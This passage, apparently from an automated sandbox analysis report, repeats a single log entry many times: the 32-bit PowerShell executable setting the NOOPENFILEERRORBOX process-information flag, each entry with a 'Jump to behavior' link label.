                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
